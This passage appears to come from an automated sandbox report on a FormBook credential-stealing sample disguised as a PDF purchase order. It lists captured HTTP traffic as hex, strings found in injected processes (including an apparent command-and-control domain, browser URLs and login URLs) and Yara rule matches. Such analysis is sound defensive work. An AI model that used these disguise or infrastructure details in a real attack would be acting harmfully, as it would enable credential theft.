6e 6b 69 74 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 47 4f 4f 47 4c 45 20 46 4f 4e 54 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 2c 33 30 30 69 2c 34 30 30 2c 34 30 30 69 2c 36 30 30 2c 36 30 30 69 2c 37 30 30 2c 37 30 30 69 2c 38 30 30 2c 38 30 30 69 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 35 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2f 63 73 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 61 62 6c 65 73 20 49 63 6f 6e 73 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 63 73 73 2f 66 61 62 6c 65 73 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 26 Sep 2024 13:23:25 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 32106X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 61 6e 69 6d 61 74 65 2e 63 73 73 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 61 6e 69 6d 61 74 65 2e 63 73 73 2d 6d 61 73 74 65 72 2f 61 6e 69 6d 61 74 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 4c 6f 61 64 20 53 63 72 65 65 6e 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 6c 6f 61 64 73 63 72 65 65 6e 2f 63 73 73 2f 73 70 69 6e 6b 69 74 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 47 4f 4f 47 4c 45 20 46 4f 4e 54 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 2c 33 30 30 69 2c 34 30 30 2c 34 30 30 69 2c 36 30 30 2c 36 30 30 69 2c 37 30 30 2c 37 30 30 69 2c 38 30 30 2c 38 30 30 69 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 35 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2f 63 73 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 61 62 6c 65 73 20 49 63 6f 6e 73 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 63 73 73 2f 66 61 62 6c 65 73 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 26 Sep 2024 13:23:27 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 32106X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 61 6e 69 6d 61 74 65 2e 63 73 73 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 61 6e 69 6d 61 74 65 2e 63 73 73 2d 6d 61 73 74 65 72 2f 61 6e 69 6d 61 74 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 4c 6f 61 64 20 53 63 72 65 65 6e 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 6c 6f 61 64 73 63 72 65 65 6e 2f 63 73 73 2f 73 70 69 6e 6b 69 74 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 47 4f 4f 47 4c 45 20 46 4f 4e 54 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 2c 33 30 30 69 2c 34 30 30 2c 34 30 30 69 2c 36 30 30 2c 36 30 30 69 2c 37 30 30 2c 37 30 30 69 2c 38 30 30 2c 38 30 30 69 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 35 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2f 63 73 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 61 62 6c 65 73 20 49 63 6f 6e 73 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 63 73 73 2f 66 61 62 6c 65 73 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 26 Sep 2024 13:23:31 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 32106X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 61 6e 69 6d 61 74 65 2e 63 73 73 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 61 6e 69 6d 61 74 65 2e 63 73 73 2d 6d 61 73 74 65 72 2f 61 6e 69 6d 61 74 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 4c 6f 61 64 20 53 63 72 65 65 6e 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 6c 6f 61 64 73 63 72 65 65 6e 2f 63 73 73 2f 73 70 69 6e 6b 69 74 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 47 4f 4f 47 4c 45 20 46 4f 4e 54 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 2c 33 30 30 69 2c 34 30 30 2c 34 30 30 69 2c 36 30 30 2c 36 30 30 69 2c 37 30 30 2c 37 30 30 69 2c 38 30 30 2c 38 30 30 69 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 35 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2f 63 73 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 61 62 6c 65 73 20 49 63 6f 6e 73 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 63 73 73 2f 66 61 62 6c 65 73 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 26 Sep 2024 13:25:00 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OWVRwH4o6es9cjRv9KQrITzRg2KDIR%2BsbB4vGKVMxFspfW7ZdvE1tyPEK1GgciZs0GZxZGO43cv1FKkEn6nYLYyMI%2F88tCw8sF%2Fn6r8xIkK2ldEGGmP7x%2BIDIGGfKPcqDmY30A%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c9393d46f097d0b-EWRContent-Encoding: gzipData Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 26 Sep 2024 13:25:03 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=crm9UGmSKpf08C3wAoPeM%2F09gSKvJtzPxskaWgjSa2cigzSTY8pZ4z9oDcb3zyg2wQLHivAoqsVBmHYZUVIse8y5cUKh9PoyxXvnmAeNWfweGgQwvpw290brO5ZfR3dZGZMHxA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c9393e7ad8a42eb-EWRContent-Encoding: gzipData Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 26 Sep 2024 13:25:06 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IProemyRG98En7CWZdF5GfaX%2FSemz5Ye%2BaDogSHz%2FU3WGZsXphsfVu4nAYsd1MLoJaxK1nz%2BqW7CmqVrraUXmpxK8CCNoNnbvuyhZRFApA2N1VLsn%2BlD%2BvpUWVFo%2FsnxdOtvlA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c9393fb0e5918bc-EWRContent-Encoding: gzipData Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0
            Source: YKkstfciYBQ.exe, 00000003.00000002.3900775999.00000000063C2000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.b5x7vk.agency
            Source: YKkstfciYBQ.exe, 00000003.00000002.3900775999.00000000063C2000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.b5x7vk.agency/zznj/
            Source: mstsc.exe, 00000004.00000003.2351304274.000000000767E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: mstsc.exe, 00000004.00000003.2351304274.000000000767E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: mstsc.exe, 00000004.00000003.2351304274.000000000767E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: mstsc.exe, 00000004.00000003.2351304274.000000000767E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: mstsc.exe, 00000004.00000003.2351304274.000000000767E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: mstsc.exe, 00000004.00000003.2351304274.000000000767E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: mstsc.exe, 00000004.00000003.2351304274.000000000767E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: YKkstfciYBQ.exe, 00000003.00000002.3899395542.000000000490C000.00000004.80000000.00040000.00000000.sdmp, mstsc.exe, 00000004.00000002.3897855714.000000000554C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Open
            Source: mstsc.exe, 00000004.00000003.2346362902.00000000006C5000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000004.00000002.3896033202.00000000006BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: mstsc.exe, 00000004.00000003.2346362902.00000000006C5000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000004.00000002.3896033202.00000000006BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: mstsc.exe, 00000004.00000003.2346362902.00000000006C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2
            Source: mstsc.exe, 00000004.00000003.2346362902.00000000006C5000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000004.00000002.3896033202.00000000006BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: mstsc.exe, 00000004.00000003.2346362902.00000000006C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033E
            Source: mstsc.exe, 00000004.00000003.2346362902.00000000006C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
            Source: mstsc.exe, 00000004.00000003.2346362902.00000000006C5000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000004.00000002.3896033202.00000000006BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033k
            Source: mstsc.exe, 00000004.00000003.2346362902.00000000006C5000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000004.00000002.3896033202.00000000006BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: mstsc.exe, 00000004.00000003.2346362902.00000000006C5000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000004.00000002.3896033202.00000000006BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: mstsc.exe, 00000004.00000003.2345245031.0000000007659000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: YKkstfciYBQ.exe, 00000003.00000002.3899395542.00000000050E6000.00000004.80000000.00040000.00000000.sdmp, mstsc.exe, 00000004.00000002.3897855714.0000000005D26000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://secure.sahibinden.com/login?return_url=http%3A%2F%2Fwww.mfgarage.net%2F3lu7%2F%3Fvf5pwn%3Dnz
            Source: YKkstfciYBQ.exe, 00000003.00000002.3899395542.0000000004456000.00000004.80000000.00040000.00000000.sdmp, mstsc.exe, 00000004.00000002.3897855714.0000000005096000.00000004.10000000.00040000.00000000.sdmp, mstsc.exe, 00000004.00000002.3899373295.0000000007390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://whois.gandi.net/en/results?search=ultraleap.net
            Source: mstsc.exe, 00000004.00000003.2351304274.000000000767E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: YKkstfciYBQ.exe, 00000003.00000002.3899395542.0000000004456000.00000004.80000000.00040000.00000000.sdmp, mstsc.exe, 00000004.00000002.3897855714.0000000005096000.00000004.10000000.00040000.00000000.sdmp, mstsc.exe, 00000004.00000002.3899373295.0000000007390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gandi.net/en/domain
            Source: mstsc.exe, 00000004.00000003.2351304274.000000000767E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_00012344 GetCursorPos,ScreenToClient,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetWindowLongW,0_2_00012344
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_0009CB26 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0009CB26

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.3895831173.0000000000480000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3897012807.0000000000D10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3897058690.0000000000D60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2158074372.0000000003B20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2157680976.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2158514500.0000000004200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3897432800.0000000002360000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.3895831173.0000000000480000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.3897012807.0000000000D10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.3897058690.0000000000D60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
